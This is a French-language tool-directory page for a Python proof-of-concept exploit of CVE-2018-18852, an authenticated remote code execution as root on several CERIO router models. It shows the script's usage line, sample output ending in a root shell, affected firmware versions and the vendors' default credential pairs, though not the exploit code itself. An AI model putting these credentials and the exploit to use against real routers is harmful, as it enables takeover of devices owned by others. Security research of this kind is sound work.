Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-18852 — CERIO RCE CVE-2018-18852, RCE web authentifiée (identifiants par défaut du constructeur) en tant qu'utilisateur root. | Kitploit
Outils/GitHubGitHub/hook-s3c/cve-2018-18852
Sécurité des Systèmes EmbarquésSécurité IoTAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubhook-s3c/cve-2018-18852

CVE-2018-18852

CERIO RCE CVE-2018-18852, RCE web authentifiée (identifiants par défaut du constructeur) en tant qu'utilisateur root.

Voir le dépôt
4516il y a 7 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Routeur CERIO RCE authentifié (identifiants fournisseur par défaut) CVE-2018-18852 PoC Python

hook-s3c (github.com/hook-s3c), @hook_s3c sur twitter

PoC Python fonctionnel pour CVE-2018-18852, initialement apparu sur ; https://github.com/hook-s3c/CVE-2018-18852

De quoi s'agit-il

Les modèles et variantes de routeurs CERIO, DT300N, DT100G, AMR-3204, WMR-200N sont vulnérables à une RCE authentifiée via le web en tant qu'utilisateur root.

Existe en tant qu'avis 0day non divulgué ; https://www.fortiguard.com/zeroday/FG-VD-18-149

Les identifiants par défaut du fournisseur sont généralement présents, donc l'exécution est triviale.

L'architecture est MIPS.

Utilisation et exemple

root@kitploit:~
Usage: exploit.py <ipaddress> <port> <creds>
root@kitploit:~

$ python ./exploit.py 127.0.0.1 8080 admin:admin

[*] ================================================
[*] CERIO RCE CVE-2018-18852, confirmé sur ;
[*] - CERIO DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3
[*] - CERIO DT-300N       - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7
[*] - CERIO DT-100G-N     - fw: Cen-AP-N2H10A V1.0.8
[*] - CERIO DT-100G       - fw: Cen-WR-G2H5 V1.0.7
[*] - CERIO DT-100GX-N    - fw: Cen-AP-N2H8A V1.0.18
[*] - CERIO AMR-3204G     - fw: Cen-AC V2.0.19
[*] - CERIO WMR-200N      - fw: Cen-HS-N2H1 V1.0.6c Test
[*]
[/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852
[/] Salutations à vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, 
[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
[/] Allez écouter l'album 'Introducing Neals' de YTCracker, l'abus de pouvoir du gouvernement n'est pas une plaisanterie - réveillez-vous, bordel
[*] ================================================

root@cerio:~# id
[!] Ce n'est peut-être pas le bon modèle (DT-300N-NGS-M), nouvel essai
[+] Jeton PID récupéré avec succès : 1312


uid=0(root) gid=0(root)

root@cerio:~# 

Combinaisons d'identifiants par défaut ;

  • operator:1234
  • admin:admin
  • root:default

Salutations

Un grand merci à vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee Allez écouter 'Introducing Neals' de YTCracker, l'abus de pouvoir du gouvernement n'est pas une plaisanterie - réveillez-vous, bordel

HTP!!!! YEET

Télécharger l’outil